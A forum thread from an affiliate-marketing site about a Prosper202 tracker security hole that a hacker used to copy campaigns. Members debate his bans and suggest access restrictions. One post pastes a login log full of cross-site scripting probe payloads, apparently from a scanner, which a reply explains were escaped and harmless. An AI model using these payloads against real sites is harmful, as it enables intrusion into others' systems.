Prosper202 Security Hole, DL new version

Status
Not open for further replies.


As much as I don't like to swim against the tide of Wickedfire, I've gotta say that networks banning this guy kinda makes me nervous. Don't get me wrong, I'm glad that justice has been done but even a murderer caught in the act gets a trial before the chair.

The fact that a network will ban someone and take any money that is due to him simply because someone else on the internet said that he has copied their landing page and keywords... as I said it makes me nervous. Because when it gets down to it, that's pretty much all he did - copy landing pages and keyword lists of a shitload of people. Of course, this is pretty much your entire business in affiliate marketing, but does that justify shutting down his accounts?

I don't deny that the way he copied them was wrong, illegal, it sucks, etc. and he should go to jail for it.

Internet whizkids, please don't hack my p202 (or domains!) because I don't agree with your views!
 
Because when it gets down to it, that's pretty much all he did - copy landing pages and keyword lists of a shitload of people.

:ugone2far: Try again... ? Hacking/unauthorized entry is not the same as simply copying.

To top it, you go on to ask WFers to not hack you for saying this...

Hypocrisy much?
 
:ugone2far: Try again... ? Hacking/unauthorized entry is not the same as simply copying.

To top it, you go on to ask WFers to not hack you for saying this...

Hypocrisy much?

Try Again... ? I also said:

"I don't deny that the way he copied them was wrong, illegal, it sucks, etc. and he should go to jail for it."

Read much?

To describe it in even simpler terms, he did 2 things:
(1) Copy campaigns by (illegal) hacking
(2) Use the knowledge gained from step (1) to make monies.

All I'm saying is that WickedFire has punished him for (2) by getting his affliliate accounts banned. This concerns me as all outperform has to do to get my affiliate account at Copeac banned is to run to them and say "He copied my shit!". Copeac sees that as a flimsy excuse to keep my last month's $50k, so they do it.
 
^^ Agreed. That's fair. I should have given you the benefit of the doubt when you said "wrong, illegal, it sucks, etc" as meaning hacking/unauthorized entry.
 
Try Again... ? I also said:

"I don't deny that the way he copied them was wrong, illegal, it sucks, etc. and he should go to jail for it."

Read much?

To describe it in even simpler terms, he did 2 things:
(1) Copy campaigns by (illegal) hacking
(2) Use the knowledge gained from step (1) to make monies.

All I'm saying is that WickedFire has punished him for (2) by getting his affliliate accounts banned. This concerns me as all outperform has to do to get my affiliate account at Copeac banned is to run to them and say "He copied my shit!". Copeac sees that as a flimsy excuse to keep my last month's $50k, so they do it.

You are trying to separate it into two different acts which makes them seemingly less bad.
The guy illegally stole data with the intention of using it to make a profit.
It doesn't matter what he stole, the fact is that he stole it. He doesn't have the right to profit from other peoples hard work.

Look around at people complaining about others copying their ads. It's not uncommon at all and you don't see anyone trying to get people banned for it.
 
This is the exact reason for firewallscript.com - Its not available to buy atm, but for the few that bought it in the past ( 1year+ ago was when it stopped being for sale) know it stopped this attack. (and the previous one also)


Budget fix is using a htaccess, deny access to every file except the public facing files (pixel, LPs, etc..)

or you can allow login locally only and RDP to it
 
The fact that a network will ban someone and take any money that is due to him simply because someone else on the internet said that he has copied their landing page and keywords... as I said it makes me nervous. Because when it gets down to it, that's pretty much all he did - copy landing pages and keyword lists of a shitload of people. Of course, this is pretty much your entire business in affiliate marketing, but does that justify shutting down his accounts?

I'm almost certain that if the situation wasn't of its magnitude and there weren't multiple complaints against this guy (plus this threads existence) the networks would have investigated it much further. At least, I'm sure Copeac and a few of the others would have.

You've gotta look at all of the variables in this guys case, there are some pretty big players involved and on the shitty end of it all. Larger affiliates all complaining about the same guy and publicly posting about it. If a network DIDN'T do anything it could end up costing them a shitload in lost revenue.

I'm all about fairness and equality in our industry but fuck that, this guy made his own bed.
 
if you have static IP address, just block all IP's (login process) and allow only your IP to login.
 
Mar 06, 09 at 4:36pm Viagra 121.22.29.185 :: ARIN / RIPE Failed
Mar 06, 09 at 4:34pm VIARGA 121.22.29.185 :: ARIN / RIPE Failed
Mar 20, 09 at 11:19am CIALIS 125.165.42.196 :: ARIN / RIPE Failed

Awesome job on getting this guy.
 
dam my p202 domain is on their too, we should come to an agreement with him and split all his domains to people he hacked , their are some good ones in there
 
The fact that a network will ban someone and take any money that is due to him simply because someone else on the internet said that he has copied their landing page and keywords... as I said it makes me nervous. Because when it gets down to it, that's pretty much all he did - copy landing pages and keyword lists of a shitload of people. Of course, this is pretty much your entire business in affiliate marketing, but does that justify shutting down his accounts?

Yes it justifies shutting down the accounts and keeping his revenue.

Read the laws on conversion (not the internet kind). You can not legally transfer ownership of, nor profit in any way from anything obtained illegally. He illegally obtained everything (by breaking into hosting accounts and PW protected sites - a felony), therefore - he has no legal right to it, or any of the proceeds from it.

There is abundant proof of who the culprit was based on IP addresses and Affiliate ID's, and the appropriate action was taken.
 
Mar 06, 09 at 4:36pm Viagra 121.22.29.185 :: ARIN / RIPE Failed
Mar 06, 09 at 4:34pm VIARGA 121.22.29.185 :: ARIN / RIPE Failed
Mar 20, 09 at 11:19am CIALIS 125.165.42.196 :: ARIN / RIPE Failed

Awesome job on getting this guy.
I think it's been established (but correct me if I'm wrong) that the Cialis/Viagra logins are failed spambots, not the hacker. See Stop Forum Spam - IP Check - 121.22.29.185 and 125.165.42.196 | Comment Spammer | IP Address Inspector | Project Honey Pot .
 
I found all this in one of my trackers =O

Feb 12, 09 at 10:21pm 0x80000000 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:21pm 111-222-1933email@address.tst 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:21pm <meta http-equiv=\'Set-cookie\' content=\'cookiename=cookievalue\'> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:21pm 111-222-1933email@address.tst 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:21pm 111-222-1933email@address.tst 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm 111-222-1933email@address.tst 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm 0.01 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm 111-222-1933email@address.tst 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm %uff1e%uff02%uff1exxx%uff1cscript%uff1ealert(399229727797);%uff1c/script%uff1e 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm PiI PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4= 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm ACUstart399219727797\'\";ACUend 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm IiBvbm1vdXNlb3Zlcj0iYWxlcnQoJ3hzcy10ZXN0Jyk= 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm Pic PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4= 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm PFNjUmlQdD5hbGVydCgneHNzLXRlc3QnKTs8L1NjUmlQdD4= 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html;charset=UTF-7\"></HEAD>+ADw-ScRiPt+AD4-alert(399149727773)+ADsAPA-/ScRiPt+AD4- 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm \0\"\'><ScRiPt >alert(399169727773);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm \0\'\"><ScRiPt >alert(399159727773);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm \' style=\'background:url(javascript:alert(399099727773))\' invalidparam=\' 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm </div><ScRiPt >alert(399139727773);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm \" onmouseover=alert(399129727773) 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <ScRiPt bad=\">\" src=\"http://testphp.acunetix.com/xss.js?399119727773\"></ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm %3CScRiPt%3Ealert(399109727773);%3C/ScRiPt%3E 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <script/xss src=http://testphp.acunetix.com/xss.js?399079727773></script> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <img src=http://testphp.acunetix.com/dot.gif onload=alert(399089727773)> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <iframe src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\" invalid=\"399039727749\"> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <embed src=\"http://testphp.acunetix.com/xss.swf?399049727749\" type=\"application/x-shockwave-flash\"/> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <\0script>alert(398979727749);</script> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <FRAMESET><FRAME SRC=\"javascript:alert(399009727749);\"></FRAMESET> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(399029727749);\"> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <scrip<script>t>alert(398989727749);</scrip</script>t> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <DIV STYLE=\"width:expression(alert(398999727749));\"> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <img src=\"javascript:alert(398969727724);\"> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm javascript:alert(398959727724) 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm email@some<ScRiPt >alert(398949727724);</ScRiPt>domain.com 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm </textarea><ScRiPt >alert(398919727724);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm </title><ScRiPt >alert(398929727724);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm --><ScRiPt >alert(398939727724);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm >\"><ScRiPt >alert(398909727724);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm >\'><ScRiPt >alert(398899727724);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <ScRiPt >alert(398889727723);</ScRiPt> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm <script>alert(398879727723)</script> 76.123.119.53 :: ARIN / RIPE Failed
Feb 12, 09 at 10:20pm 111-222-1933email@address.tst 76.123.119.53 :: ARIN / RIPE Faile
 
I 3rd that idea of donating profits wes and the 202 team I was on that list too
 
I found all this in one of my trackers =O


That looks like an XSS attack although it doesn't look like it will work, because all of the html is escaped on the output, so its not executing that malicous code on your browser when you open it, which it is attended to do.

For those who wish to know more about them Cross-site scripting - Wikipedia, the free encyclopedia

thanks everyone for the kind gestures.
 
Status
Not open for further replies.